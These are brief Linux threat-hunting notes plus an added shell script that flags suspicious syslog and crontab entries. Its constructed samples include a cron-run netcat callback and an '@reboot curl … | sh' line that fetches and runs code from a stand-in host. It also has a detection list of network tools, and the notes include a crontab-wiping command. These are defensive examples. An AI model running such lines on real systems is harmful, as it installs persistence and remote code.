Threat Hunting

Windows

Just use Sysinternals (5head)

Linux

View Processes

ps aux

List running Services

systemctl list-units --type=service --state=running

Check your logs

It can be useful to search for "nc" or other attacker tools:

grep <something> /var/log/syslog

Crontab

Check your crontab:

crontab -l

Clear your crontab:

crontab -r

Listening TCP and UDP sockets

ss -tulpn
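As an added example (not from the original notes), a small POSIX sh helper that wraps the syslog and crontab checks above: the log search matches tool names only as whole words (a plain grep for "nc" also hits "rsync" and "synchronize"), and the crontab filter flags the usual red flags; the log and crontab lines are constructed samples and hunt.sh is an assumed file name.

```shell
#!/bin/sh
# Added helper, not from the original notes. All sample data below is
# constructed for the demo, not taken from a real host.

# Constructed syslog excerpt. "Synchronize" and "rsync" contain "nc" but are
# not the tool, which is why hunt_log matches on word boundaries.
SAMPLE_SYSLOG='Mar 10 12:00:01 host CRON[1234]: (www-data) CMD (/tmp/.x/nc 10.0.0.5 4444)
Mar 10 12:00:02 host sshd[1300]: Accepted publickey for deploy from 192.168.1.10 port 51000
Mar 10 12:00:03 host systemd[1]: Starting Synchronize boot clock...
Mar 10 12:00:04 host rsync[1400]: sent 1024 bytes  received 35 bytes
Mar 10 12:00:05 host sudo[1500]: deploy : COMMAND=/usr/bin/nmap 10.0.0.5'

# Constructed crontab: one legitimate job, two that deserve a look.
SAMPLE_CRONTAB='# m h dom mon dow command
0 2 * * * /usr/local/bin/backup.sh
*/5 * * * * /tmp/.x/update.sh
@reboot curl -s http://example.invalid/a | sh'

# Tool names worth flagging; extend the list for your environment.
SUSPECT_TOOLS='nc|ncat|netcat|socat|nmap'

# hunt_log [FILE...]: print lines that mention a suspect tool as a whole word
# (reads stdin when no file is given, so it also works on journalctl output).
hunt_log() {
    grep -E -i "(^|[^[:alnum:]_])($SUSPECT_TOOLS)([^[:alnum:]_]|$)" "$@"
}

# hunt_cron [FILE...]: print non-comment cron entries that run from a temporary
# or world-writable path, decode base64, or pipe a download straight into a shell.
hunt_cron() {
    grep -v '^[[:space:]]*#' "$@" |
        grep -E '(/tmp/|/var/tmp/|/dev/shm/|base64 (-d|--decode)|(curl|wget) .*\| *(ba)?sh)'
}

# On a live host: crontab -l only shows the invoking user's jobs, so also feed
# /etc/crontab, /etc/cron.d/* and each user's crontab (crontab -u USER -l, as root).
# Usage (hunt.sh is an assumed file name):
#   sh hunt.sh demo                        # run on the constructed samples
#   hunt_log /var/log/syslog               # after: . ./hunt.sh
#   hunt_cron /etc/crontab /etc/cron.d/*
if [ "${1:-}" = "demo" ]; then
    printf '%s\n' "$SAMPLE_SYSLOG" | hunt_log
    printf '%s\n' "$SAMPLE_CRONTAB" | hunt_cron
fi
```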